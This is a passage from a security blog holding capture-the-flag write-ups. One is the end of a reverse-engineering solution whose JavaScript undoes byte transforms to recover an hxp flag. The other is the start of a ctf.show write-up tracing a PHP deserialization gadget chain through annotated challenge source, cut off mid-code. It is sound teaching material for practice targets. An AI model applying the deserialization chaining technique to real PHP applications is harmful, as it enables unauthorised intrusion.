class="line">f[<span class="number">2</span>]=~f[<span class="number">2</span>]&amp;<span class="number">0xff</span></span><br><span class="line">f[<span class="number">12</span>]^=f[<span class="number">1</span>]</span><br><span class="line">f[<span class="number">10</span>]^=f[<span class="number">0</span>]</span><br><span class="line">f[<span class="number">5</span>]^=f[<span class="number">13</span>]</span><br><span class="line">f[<span class="number">13</span>]^=f[<span class="number">1</span>]</span><br><span class="line">f[<span class="number">17</span>]=f[<span class="number">17</span>]&lt;&lt;<span class="number">1</span>&amp;<span class="number">0xff</span>|f[<span class="number">17</span>]&gt;&gt;<span class="number">7</span></span><br><span class="line">f[<span class="number">9</span>]^=f[<span class="number">2</span>]</span><br><span class="line">f[<span class="number">27</span>]=(((f[<span class="number">27</span>]*<span class="number">0x0802</span>&amp;<span class="number">0x22110</span>)|(f[<span class="number">27</span>]*<span class="number">0x8020</span>&amp;<span class="number">0x88440</span>))*<span class="number">0x10101</span>&gt;&gt;&gt;<span class="number">16</span>)&amp;<span class="number">0xff</span></span><br><span class="line">f[<span class="number">14</span>]=~f[<span class="number">14</span>]&amp;<span class="number">0xff</span></span><br><span class="line">f[<span class="number">1</span>]^=f[<span class="number">28</span>]</span><br><span class="line">f[<span class="number">0</span>]^=f[<span class="number">1</span>]</span><br><span class="line">f[<span class="number">1</span>]-=f[<span class="number">13</span>],f[<span class="number">1</span>]&amp;=<span class="number">0xff</span></span><br><span class="line">f[<span class="number">14</span>]-=f[<span class="number">9</span>],f[<span class="number">14</span>]&amp;=<span class="number">0xff</span></span><br><span class="line">f[<span class="number">25</span>]^=f[<span class="number">21</span>]</span><br><span class="line">f[<span class="number">16</span>]+=f[<span class="number">3</span>],f[<span class="number">16</span>]&amp;=<span class="number">0xff</span></span><br><span class="line">f[<span class="number">17</span>]=f[<span class="number">17</span>]&lt;&lt;<span class="number">7</span>&amp;<span class="number">0xff</span>|f[<span class="number">17</span>]&gt;&gt;<span class="number">1</span></span><br><span class="line">f[<span class="number">17</span>]+=f[<span class="number">18</span>],f[<span class="number">17</span>]&amp;=<span class="number">0xff</span></span><br><span class="line">f[<span class="number">26</span>]=(((f[<span class="number">26</span>]*<span class="number">0x0802</span>&amp;<span class="number">0x22110</span>)|(f[<span class="number">26</span>]*<span class="number">0x8020</span>&amp;<span class="number">0x88440</span>))*<span class="number">0x10101</span>&gt;&gt;&gt;<span class="number">16</span>)&amp;<span class="number">0xff</span></span><br><span class="line">f[<span class="number">4</span>]+=f[<span class="number">29</span>],f[<span class="number">4</span>]&amp;=<span class="number">0xff</span></span><br><span class="line">f[<span class="number">21</span>]^=f[<span class="number">22</span>]</span><br><span class="line">f[<span class="number">14</span>]+=f[<span class="number">2</span>],f[<span class="number">14</span>]&amp;=<span class="number">0xff</span></span><br><span class="line">f[<span class="number">22</span>]+=f[<span class="number">5</span>],f[<span class="number">22</span>]&amp;=<span class="number">0xff</span></span><br><span class="line">f[<span class="number">1</span>]^=f[<span class="number">18</span>]</span><br><span class="line">f[<span class="number">3</span>]-=f[<span class="number">28</span>],f[<span class="number">3</span>]&amp;=<span class="number">0xff</span></span><br><span class="line">f[<span class="number">7</span>]+=f[<span class="number">6</span>],f[<span class="number">7</span>]&amp;=<span class="number">0xff</span></span><br><span class="line">f[<span class="number">6</span>]+=f[<span class="number">17</span>],f[<span class="number">6</span>]&amp;=<span class="number">0xff</span></span><br><span class="line">f[<span class="number">5</span>]-=f[<span class="number">15</span>],f[<span class="number">5</span>]&amp;=<span class="number">0xff</span></span><br><span class="line">f[<span class="number">6</span>]=~f[<span class="number">6</span>]&amp;<span class="number">0xff</span></span><br><span class="line">f[<span class="number">7</span>]=f[<span class="number">7</span>]&lt;&lt;<span class="number">1</span>&amp;<span class="number">0xff</span>|f[<span class="number">7</span>]&gt;&gt;<span class="number">7</span></span><br><span class="line">f[<span class="number">9</span>]-=f[<span class="number">16</span>],f[<span class="number">9</span>]&amp;=<span class="number">0xff</span></span><br><span class="line">f[<span class="number">11</span>]=f[<span class="number">11</span>]&lt;&lt;<span class="number">1</span>&amp;<span class="number">0xff</span>|f[<span class="number">11</span>]&gt;&gt;<span class="number">7</span></span><br><span class="line">f[<span class="number">23</span>]=f[<span class="number">23</span>]&lt;&lt;<span class="number">1</span>&amp;<span class="number">0xff</span>|f[<span class="number">23</span>]&gt;&gt;<span class="number">7</span></span><br><span class="line">f[<span class="number">3</span>]+=f[<span class="number">22</span>],f[<span class="number">3</span>]&amp;=<span class="number">0xff</span></span><br><span class="line">f[<span class="number">17</span>]=f[<span class="number">17</span>]&lt;&lt;<span class="number">1</span>&amp;<span class="number">0xff</span>|f[<span class="number">17</span>]&gt;&gt;<span class="number">7</span></span><br><span class="line">f[<span class="number">2</span>]^=f[<span class="number">15</span>]</span><br><span class="line">f[<span class="number">2</span>]=f[<span class="number">2</span>]&lt;&lt;<span class="number">1</span>&amp;<span class="number">0xff</span>|f[<span class="number">2</span>]&gt;&gt;<span class="number">7</span></span><br><span class="line"><span class="comment">// f[14]=f[14]^(f[14]&gt;&gt;1)</span></span><br><span class="line"><span class="keyword">for</span> (<span class="keyword">var</span> i = <span class="number">0</span>; i &lt;= <span class="number">255</span>; i++) &#123;</span><br><span class="line">    <span class="keyword">if</span> ((i^(i&gt;&gt;<span class="number">1</span>)) == f[<span class="number">14</span>]) &#123;</span><br><span class="line">        f[<span class="number">14</span>] = i</span><br><span class="line">        <span class="keyword">break</span></span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line">f[<span class="number">25</span>]+=f[<span class="number">22</span>],f[<span class="number">25</span>]&amp;=<span class="number">0xff</span></span><br><span class="line">f[<span class="number">28</span>]=f[<span class="number">28</span>]&lt;&lt;<span class="number">7</span>&amp;<span class="number">0xff</span>|f[<span class="number">28</span>]&gt;&gt;<span class="number">1</span></span><br><span class="line">f[<span class="number">1</span>]+=f[<span class="number">10</span>],f[<span class="number">1</span>]&amp;=<span class="number">0xff</span></span><br><span class="line">f[<span class="number">13</span>]-=f[<span class="number">9</span>],f[<span class="number">13</span>]&amp;=<span class="number">0xff</span></span><br><span class="line">f[<span class="number">16</span>]^=f[<span class="number">6</span>]</span><br><span class="line">f[<span class="number">24</span>]+=f[<span class="number">7</span>],f[<span class="number">24</span>]&amp;=<span class="number">0xff</span></span><br><span class="line"><span class="comment">// f[14]=f[14]^(f[14]&gt;&gt;1)</span></span><br><span class="line"><span class="keyword">for</span> (<span class="keyword">var</span> i = <span class="number">0</span>; i &lt;= <span class="number">255</span>; i++) &#123;</span><br><span class="line">    <span class="keyword">if</span> ((i^(i&gt;&gt;<span class="number">1</span>)) == f[<span class="number">14</span>]) &#123;</span><br><span class="line">        f[<span class="number">14</span>] = i</span><br><span class="line">        <span class="keyword">break</span></span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line">f[<span class="number">17</span>]=f[<span class="number">17</span>]&lt;&lt;<span class="number">1</span>&amp;<span class="number">0xff</span>|f[<span class="number">17</span>]&gt;&gt;<span class="number">7</span></span><br><span class="line">f[<span class="number">17</span>]=f[<span class="number">17</span>]&lt;&lt;<span class="number">7</span>&amp;<span class="number">0xff</span>|f[<span class="number">17</span>]&gt;&gt;<span class="number">1</span></span><br><span class="line">f[<span class="number">14</span>]=~f[<span class="number">14</span>]&amp;<span class="number">0xff</span></span><br><span class="line">f[<span class="number">0</span>]+=f[<span class="number">4</span>],f[<span class="number">0</span>]&amp;=<span class="number">0xff</span></span><br><span class="line">f[<span class="number">1</span>]+=f[<span class="number">13</span>],f[<span class="number">1</span>]&amp;=<span class="number">0xff</span></span><br><span class="line">f[<span class="number">6</span>]^=f[<span class="number">1</span>]</span><br><span class="line">f[<span class="number">9</span>]-=f[<span class="number">20</span>],f[<span class="number">9</span>]&amp;=<span class="number">0xff</span></span><br><span class="line">f[<span class="number">15</span>]+=f[<span class="number">2</span>],f[<span class="number">15</span>]&amp;=<span class="number">0xff</span></span><br><span class="line"><span class="comment">// f[13]=f[13]^(f[13]&gt;&gt;1)</span></span><br><span class="line"><span class="keyword">for</span> (<span class="keyword">var</span> i = <span class="number">0</span>; i &lt;= <span class="number">255</span>; i++) &#123;</span><br><span class="line">    <span class="keyword">if</span> ((i^(i&gt;&gt;<span class="number">1</span>)) == f[<span class="number">13</span>]) &#123;</span><br><span class="line">        f[<span class="number">13</span>] = i</span><br><span class="line">        <span class="keyword">break</span></span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line">f[<span class="number">18</span>]=~f[<span class="number">18</span>]&amp;<span class="number">0xff</span></span><br><span class="line">f[<span class="number">11</span>]=f[<span class="number">11</span>]&lt;&lt;<span class="number">1</span>&amp;<span class="number">0xff</span>|f[<span class="number">11</span>]&gt;&gt;<span class="number">7</span></span><br><span class="line">f[<span class="number">17</span>]=f[<span class="number">17</span>]&lt;&lt;<span class="number">1</span>&amp;<span class="number">0xff</span>|f[<span class="number">17</span>]&gt;&gt;<span class="number">7</span></span><br><span class="line">f[<span class="number">3</span>]=f[<span class="number">3</span>]&lt;&lt;<span class="number">7</span>&amp;<span class="number">0xff</span>|f[<span class="number">3</span>]&gt;&gt;<span class="number">1</span></span><br><span class="line">f[<span class="number">15</span>]^=f[<span class="number">20</span>]</span><br><span class="line"><span class="comment">// f[28]=f[28]^(f[28]&gt;&gt;1)</span></span><br><span class="line"><span class="keyword">for</span> (<span class="keyword">var</span> i = <span class="number">0</span>; i &lt;= <span class="number">255</span>; i++) &#123;</span><br><span class="line">    <span class="keyword">if</span> ((i^(i&gt;&gt;<span class="number">1</span>)) == f[<span class="number">28</span>]) &#123;</span><br><span class="line">        f[<span class="number">28</span>] = i</span><br><span class="line">        <span class="keyword">break</span></span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"><span class="comment">// f[20]=f[20]^(f[20]&gt;&gt;1)</span></span><br><span class="line"><span class="keyword">for</span> (<span class="keyword">var</span> i = <span class="number">0</span>; i &lt;= <span class="number">255</span>; i++) &#123;</span><br><span class="line">    <span class="keyword">if</span> ((i^(i&gt;&gt;<span class="number">1</span>)) == f[<span class="number">20</span>]) &#123;</span><br><span class="line">        f[<span class="number">20</span>] = i</span><br><span class="line">        <span class="keyword">break</span></span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line">f[<span class="number">24</span>]=f[<span class="number">24</span>]&lt;&lt;<span class="number">7</span>&amp;<span class="number">0xff</span>|f[<span class="number">24</span>]&gt;&gt;<span class="number">1</span></span><br><span class="line">f[<span class="number">22</span>]+=f[<span class="number">2</span>],f[<span class="number">22</span>]&amp;=<span class="number">0xff</span></span><br><span class="line">f[<span class="number">2</span>]-=f[<span class="number">5</span>],f[<span class="number">2</span>]&amp;=<span class="number">0xff</span></span><br><span class="line">f[<span class="number">7</span>]=~f[<span class="number">7</span>]&amp;<span class="number">0xff</span></span><br><span class="line">f[<span class="number">29</span>]+=f[<span class="number">9</span>],f[<span class="number">29</span>]&amp;=<span class="number">0xff</span></span><br><span class="line">f[<span class="number">6</span>]-=f[<span class="number">17</span>],f[<span class="number">6</span>]&amp;=<span class="number">0xff</span></span><br><span class="line">f[<span class="number">6</span>]+=f[<span class="number">1</span>],f[<span class="number">6</span>]&amp;=<span class="number">0xff</span></span><br><span class="line">f[<span class="number">0</span>]+=f[<span class="number">11</span>],f[<span class="number">0</span>]&amp;=<span class="number">0xff</span></span><br><span class="line">f[<span class="number">2</span>]-=f[<span class="number">5</span>],f[<span class="number">2</span>]&amp;=<span class="number">0xff</span></span><br><span class="line">f[<span class="number">25</span>]-=f[<span class="number">12</span>],f[<span class="number">25</span>]&amp;=<span class="number">0xff</span></span><br><span class="line">f[<span class="number">15</span>]=f[<span class="number">15</span>]&lt;&lt;<span class="number">7</span>&amp;<span class="number">0xff</span>|f[<span class="number">15</span>]&gt;&gt;<span class="number">1</span></span><br><span class="line">f[<span class="number">25</span>]=f[<span class="number">25</span>]&lt;&lt;<span class="number">1</span>&amp;<span class="number">0xff</span>|f[<span class="number">25</span>]&gt;&gt;<span class="number">7</span></span><br><span class="line">f[<span class="number">12</span>]^=f[<span class="number">14</span>]</span><br><span class="line"><span class="comment">// f[25]=f[25]^(f[25]&gt;&gt;1)</span></span><br><span class="line"><span class="keyword">for</span> (<span class="keyword">var</span> i = <span class="number">0</span>; i &lt;= <span class="number">255</span>; i++) &#123;</span><br><span class="line">    <span class="keyword">if</span> ((i^(i&gt;&gt;<span class="number">1</span>)) == f[<span class="number">25</span>]) &#123;</span><br><span class="line">        f[<span class="number">25</span>] = i</span><br><span class="line">        <span class="keyword">break</span></span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line">f[<span class="number">10</span>]-=f[<span class="number">24</span>],f[<span class="number">10</span>]&amp;=<span class="number">0xff</span></span><br><span class="line">f[<span class="number">2</span>]-=f[<span class="number">6</span>],f[<span class="number">2</span>]&amp;=<span class="number">0xff</span></span><br><span class="line">f[<span class="number">20</span>]+=f[<span class="number">24</span>],f[<span class="number">20</span>]&amp;=<span class="number">0xff</span></span><br><span class="line">f[<span class="number">11</span>]^=f[<span class="number">2</span>]</span><br><span class="line">f[<span class="number">20</span>]=~f[<span class="number">20</span>]&amp;<span class="number">0xff</span></span><br><span class="line">f[<span class="number">20</span>]=f[<span class="number">20</span>]&lt;&lt;<span class="number">1</span>&amp;<span class="number">0xff</span>|f[<span class="number">20</span>]&gt;&gt;<span class="number">7</span></span><br><span class="line">f[<span class="number">20</span>]=f[<span class="number">20</span>]&lt;&lt;<span class="number">1</span>&amp;<span class="number">0xff</span>|f[<span class="number">20</span>]&gt;&gt;<span class="number">7</span></span><br><span class="line">f[<span class="number">1</span>]=f[<span class="number">1</span>]&lt;&lt;<span class="number">1</span>&amp;<span class="number">0xff</span>|f[<span class="number">1</span>]&gt;&gt;<span class="number">7</span></span><br><span class="line">f[<span class="number">4</span>]+=f[<span class="number">18</span>],f[<span class="number">4</span>]&amp;=<span class="number">0xff</span></span><br><span class="line">f[<span class="number">29</span>]+=f[<span class="number">24</span>],f[<span class="number">29</span>]&amp;=<span class="number">0xff</span></span><br><span class="line">f[<span class="number">24</span>]-=f[<span class="number">14</span>],f[<span class="number">24</span>]&amp;=<span class="number">0xff</span></span><br><span class="line">f[<span class="number">8</span>]^=f[<span class="number">9</span>]</span><br><span class="line">f[<span class="number">11</span>]-=f[<span class="number">8</span>],f[<span class="number">11</span>]&amp;=<span class="number">0xff</span></span><br><span class="line">f[<span class="number">16</span>]=f[<span class="number">16</span>]&lt;&lt;<span class="number">7</span>&amp;<span class="number">0xff</span>|f[<span class="number">16</span>]&gt;&gt;<span class="number">1</span></span><br><span class="line">f[<span class="number">26</span>]-=f[<span class="number">22</span>],f[<span class="number">26</span>]&amp;=<span class="number">0xff</span></span><br><span class="line">f[<span class="number">4</span>]-=f[<span class="number">3</span>],f[<span class="number">4</span>]&amp;=<span class="number">0xff</span></span><br><span class="line">f[<span class="number">23</span>]=~f[<span class="number">23</span>]&amp;<span class="number">0xff</span></span><br><span class="line">f[<span class="number">11</span>]+=f[<span class="number">20</span>],f[<span class="number">11</span>]&amp;=<span class="number">0xff</span></span><br><span class="line">f[<span class="number">7</span>]+=f[<span class="number">6</span>],f[<span class="number">7</span>]&amp;=<span class="number">0xff</span></span><br><span class="line">f[<span class="number">11</span>]=f[<span class="number">11</span>]&lt;&lt;<span class="number">1</span>&amp;<span class="number">0xff</span>|f[<span class="number">11</span>]&gt;&gt;<span class="number">7</span></span><br><span class="line">f[<span class="number">16</span>]=f[<span class="number">16</span>]&lt;&lt;<span class="number">7</span>&amp;<span class="number">0xff</span>|f[<span class="number">16</span>]&gt;&gt;<span class="number">1</span></span><br><span class="line">f[<span class="number">13</span>]+=f[<span class="number">18</span>],f[<span class="number">13</span>]&amp;=<span class="number">0xff</span></span><br><span class="line">f[<span class="number">4</span>]=~f[<span class="number">4</span>]&amp;<span class="number">0xff</span></span><br><span class="line">f[<span class="number">1</span>]+=f[<span class="number">4</span>],f[<span class="number">1</span>]&amp;=<span class="number">0xff</span></span><br><span class="line">f[<span class="number">29</span>]=f[<span class="number">29</span>]&lt;&lt;<span class="number">1</span>&amp;<span class="number">0xff</span>|f[<span class="number">29</span>]&gt;&gt;<span class="number">7</span></span><br><span class="line">f[<span class="number">14</span>]^=f[<span class="number">21</span>]</span><br><span class="line">f[<span class="number">26</span>]=f[<span class="number">26</span>]&lt;&lt;<span class="number">1</span>&amp;<span class="number">0xff</span>|f[<span class="number">26</span>]&gt;&gt;<span class="number">7</span></span><br><span class="line">f[<span class="number">5</span>]=f[<span class="number">5</span>]&lt;&lt;<span class="number">7</span>&amp;<span class="number">0xff</span>|f[<span class="number">5</span>]&gt;&gt;<span class="number">1</span></span><br><span class="line">f[<span class="number">13</span>]+=f[<span class="number">3</span>],f[<span class="number">13</span>]&amp;=<span class="number">0xff</span></span><br><span class="line">f[<span class="number">4</span>]^=f[<span class="number">15</span>]</span><br><span class="line">f[<span class="number">22</span>]=f[<span class="number">22</span>]&lt;&lt;<span class="number">1</span>&amp;<span class="number">0xff</span>|f[<span class="number">22</span>]&gt;&gt;<span class="number">7</span></span><br><span class="line">f[<span class="number">15</span>]^=f[<span class="number">20</span>]</span><br><span class="line">f[<span class="number">10</span>]^=f[<span class="number">29</span>]</span><br><span class="line">f[<span class="number">5</span>]+=f[<span class="number">7</span>],f[<span class="number">5</span>]&amp;=<span class="number">0xff</span></span><br><span class="line"><span class="comment">// f[4]=f[4]^(f[4]&gt;&gt;1)</span></span><br><span class="line"><span class="keyword">for</span> (<span class="keyword">var</span> i = <span class="number">0</span>; i &lt;= <span class="number">255</span>; i++) &#123;</span><br><span class="line">    <span class="keyword">if</span> ((i^(i&gt;&gt;<span class="number">1</span>)) == f[<span class="number">4</span>]) &#123;</span><br><span class="line">        f[<span class="number">4</span>] = i</span><br><span class="line">        <span class="keyword">break</span></span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line">f[<span class="number">8</span>]=f[<span class="number">8</span>]&lt;&lt;<span class="number">7</span>&amp;<span class="number">0xff</span>|f[<span class="number">8</span>]&gt;&gt;<span class="number">1</span></span><br><span class="line">f[<span class="number">18</span>]+=f[<span class="number">29</span>],f[<span class="number">18</span>]&amp;=<span class="number">0xff</span></span><br><span class="line">f[<span class="number">26</span>]+=f[<span class="number">0</span>],f[<span class="number">26</span>]&amp;=<span class="number">0xff</span></span><br><span class="line">f[<span class="number">26</span>]+=f[<span class="number">7</span>],f[<span class="number">26</span>]&amp;=<span class="number">0xff</span></span><br><span class="line">f[<span class="number">13</span>]=~f[<span class="number">13</span>]&amp;<span class="number">0xff</span></span><br><span class="line">f[<span class="number">14</span>]-=f[<span class="number">29</span>],f[<span class="number">14</span>]&amp;=<span class="number">0xff</span></span><br><span class="line">f[<span class="number">16</span>]-=f[<span class="number">13</span>],f[<span class="number">16</span>]&amp;=<span class="number">0xff</span></span><br><span class="line">f[<span class="number">0</span>]=~f[<span class="number">0</span>]&amp;<span class="number">0xff</span></span><br><span class="line">f[<span class="number">28</span>]=~f[<span class="number">28</span>]&amp;<span class="number">0xff</span></span><br><span class="line">f[<span class="number">11</span>]=f[<span class="number">11</span>]&lt;&lt;<span class="number">7</span>&amp;<span class="number">0xff</span>|f[<span class="number">11</span>]&gt;&gt;<span class="number">1</span></span><br><span class="line"><span class="comment">// f[16]=f[16]^(f[16]&gt;&gt;1)</span></span><br><span class="line"><span class="keyword">for</span> (<span class="keyword">var</span> i = <span class="number">0</span>; i &lt;= <span class="number">255</span>; i++) &#123;</span><br><span class="line">    <span class="keyword">if</span> ((i^(i&gt;&gt;<span class="number">1</span>)) == f[<span class="number">16</span>]) &#123;</span><br><span class="line">        f[<span class="number">16</span>] = i</span><br><span class="line">        <span class="keyword">break</span></span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line">f[<span class="number">9</span>]^=f[<span class="number">4</span>]</span><br><span class="line">f[<span class="number">9</span>]^=f[<span class="number">1</span>]</span><br><span class="line"><span class="comment">// f[15]=f[15]^(f[15]&gt;&gt;1)</span></span><br><span class="line"><span class="keyword">for</span> (<span class="keyword">var</span> i = <span class="number">0</span>; i &lt;= <span class="number">255</span>; i++) &#123;</span><br><span class="line">    <span class="keyword">if</span> ((i^(i&gt;&gt;<span class="number">1</span>)) == f[<span class="number">15</span>]) &#123;</span><br><span class="line">        f[<span class="number">15</span>] = i</span><br><span class="line">        <span class="keyword">break</span></span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"><span class="comment">// f[23]=f[23]^(f[23]&gt;&gt;1)</span></span><br><span class="line"><span class="keyword">for</span> (<span class="keyword">var</span> i = <span class="number">0</span>; i &lt;= <span class="number">255</span>; i++) &#123;</span><br><span class="line">    <span class="keyword">if</span> ((i^(i&gt;&gt;<span class="number">1</span>)) == f[<span class="number">23</span>]) &#123;</span><br><span class="line">        f[<span class="number">23</span>] = i</span><br><span class="line">        <span class="keyword">break</span></span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line">f[<span class="number">20</span>]=f[<span class="number">20</span>]&lt;&lt;<span class="number">1</span>&amp;<span class="number">0xff</span>|f[<span class="number">20</span>]&gt;&gt;<span class="number">7</span></span><br><span class="line">f[<span class="number">2</span>]=~f[<span class="number">2</span>]&amp;<span class="number">0xff</span></span><br><span class="line">f[<span class="number">6</span>]=f[<span class="number">6</span>]&lt;&lt;<span class="number">1</span>&amp;<span class="number">0xff</span>|f[<span class="number">6</span>]&gt;&gt;<span class="number">7</span></span><br><span class="line">f[<span class="number">3</span>]^=f[<span class="number">11</span>]</span><br><span class="line">f[<span class="number">29</span>]=~f[<span class="number">29</span>]&amp;<span class="number">0xff</span></span><br><span class="line">f[<span class="number">17</span>]-=f[<span class="number">5</span>],f[<span class="number">17</span>]&amp;=<span class="number">0xff</span></span><br><span class="line"></span><br><span class="line"><span class="built_in">console</span>.log(<span class="string">&quot;f = &quot;</span> + f)</span><br><span class="line">out = <span class="string">&#x27;&#x27;</span></span><br><span class="line"><span class="keyword">for</span> (<span class="keyword">let</span> i <span class="keyword">of</span> f) &#123;</span><br><span class="line">    out += <span class="built_in">String</span>.fromCharCode(i)</span><br><span class="line">&#125;</span><br><span class="line"><span class="built_in">console</span>.log(out)</span><br></pre></td></tr></table></figure>

<p><img src="1678692842955-d36157cd-9165-432c-b902-187299c1f718-8863715.png" alt="img"></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">hxp&#123;Cann0t_f1nd_m0dule_&#x27;fl4g&#x27;&#125;</span><br></pre></td></tr></table></figure>


      
    </div>

    
    
    
      <footer class="post-footer">
        <div class="post-eof"></div>
      </footer>
  </article>
  
  
  

      
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block" lang="en">
    <link itemprop="mainEntityOfPage" href="http://example.com/2022/03/05/ctfshow-easy-unserialize/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/avatar.gif">
      <meta itemprop="name" content="sixxx1">
      <meta itemprop="description" content="">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="sixxx1 | blog">
    </span>
      <header class="post-header">
        <h2 class="post-title" itemprop="name headline">
          
            <a href="/2022/03/05/ctfshow-easy-unserialize/" class="post-title-link" itemprop="url">[ctf.show] 卷王杯 easy unserialize</a>
        </h2>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-calendar"></i>
              </span>
              <span class="post-meta-item-text">Posted on</span>
              

              <time title="Created: 2022-03-05 11:08:47 / Modified: 18:18:32" itemprop="dateCreated datePublished" datetime="2022-03-05T11:08:47+08:00">2022-03-05</time>
            </span>
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-folder"></i>
              </span>
              <span class="post-meta-item-text">In</span>
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/CTF/" itemprop="url" rel="index"><span itemprop="name">CTF</span></a>
                </span>
            </span>

          

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
          <blockquote>
<p>来自 ctf.show 卷王杯 easy unserialize 题目</p>
</blockquote>
<h2 id="0x00-题目"><a href="#0x00-题目" class="headerlink" title="0x00 题目"></a>0x00 题目</h2><p>一道PHP反序列化题目，拿到源码之后可以先边看代码边做一下注释，比如反序列化入口一般从 <code>__construct()</code>  和  <code>__destruct()</code> 函数开始（因为这两个是实例化一个类时一定会触发的方法，没有太多条件限制）。</p>
<p>比如这道题，有 <code>__destruct()</code>  和 <code>__construct()</code>  的只有 <code>one</code> 和 <code> third</code> 两个类，其中 <code>third</code> 的构造函数只是做了一下私有变量赋值，没有再调用其他函数的利用价值，因此可以着重看一下 one 类的 <code>__destruct()</code> 函数，从这里入手开始找调用路径。</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="comment">/**</span></span><br><span class="line"><span class="comment"> * <span class="doctag">@Author</span>: F10wers_13eiCheng</span></span><br><span class="line"><span class="comment"> * <span class="doctag">@Date</span>:   2022-02-01 11:25:02</span></span><br><span class="line"><span class="comment"> * <span class="doctag">@Last</span> Modified by:   F10wers_13eiCheng</span></span><br><span class="line"><span class="comment"> * <span class="doctag">@Last</span> Modified time: 2022-02-07 15:08:18</span></span><br><span class="line"><span class="comment"> */</span></span><br><span class="line"><span class="keyword">include</span>(<span class="string">&quot;./HappyYear.php&quot;</span>);</span><br><span class="line"></span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">one</span> </span>&#123;</span><br><span class="line">    <span class="keyword">public</span> <span class="variable">$object</span>;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">MeMeMe</span>(<span class="params"></span>) </span>&#123;</span><br><span class="line">        array_walk(<span class="keyword">$this</span>, <span class="function"><span class="keyword">function</span>(<span class="params"><span class="variable">$fn</span>, <span class="variable">$prev</span></span>)</span>&#123;</span><br><span class="line">            <span class="keyword">if</span> (<span class="variable">$fn</span>[<span class="number">0</span>] === <span class="string">&quot;Happy_func&quot;</span> &amp;&amp; <span class="variable">$prev</span> === <span class="string">&quot;year_parm&quot;</span>) &#123;</span><br><span class="line">                <span class="keyword">global</span> <span class="variable">$talk</span>;</span><br><span class="line">                <span class="keyword">echo</span> <span class="string">&quot;<span class="subst">$talk</span>&quot;</span>.<span class="string">&quot;&lt;/br&gt;&quot;</span>;</span><br><span class="line">                <span class="keyword">global</span> <span class="variable">$flag</span>;</span><br><span class="line">                <span class="keyword">echo</span> <span class="variable">$flag</span>;</span><br><span class="line">            &#125;</span><br><span class="line">        &#125;);</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">__destruct</span>(<span class="params"></span>) </span>&#123;		<span class="comment">// 1、反序列化入口</span></span><br><span class="line">        @<span class="keyword">$this</span>-&gt;object-&gt;add();	  <span class="comment">// 所有类都没有 add() 函数，因此可以触发 __call() 方法，从而定位 second 类</span></span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">__toString</span>(<span class="params"></span>) </span>&#123;		<span class="comment">// 4、从 seconde.addMe() 过来的</span></span><br><span class="line">        <span class="keyword">return</span> <span class="keyword">$this</span>-&gt;object-&gt;string;	<span class="comment">// 只有 third 有 string 变量，而且是私有变量，因此调用了 third.__get() 方法。</span></span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">second</span> </span>&#123;</span><br><span class="line">    <span class="keyword">protected</span> <span class="variable">$filename</span>;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">protected</span> <span class="function"><span class="keyword">function</span> <span class="title">addMe</span>(<span class="params"></span>) </span>&#123;		<span class="comment">// 3、第三步到这里</span></span><br><span class="line">        <span class="keyword">return</span> <span class="string">&quot;Wow you have sovled&quot;</span>.<span class="keyword">$this</span>-&gt;filename; <span class="comment">// 把filename当作字符串使用，所以可以调用 __toString() 方法，又找到 one 类</span></span><br><span class="line">    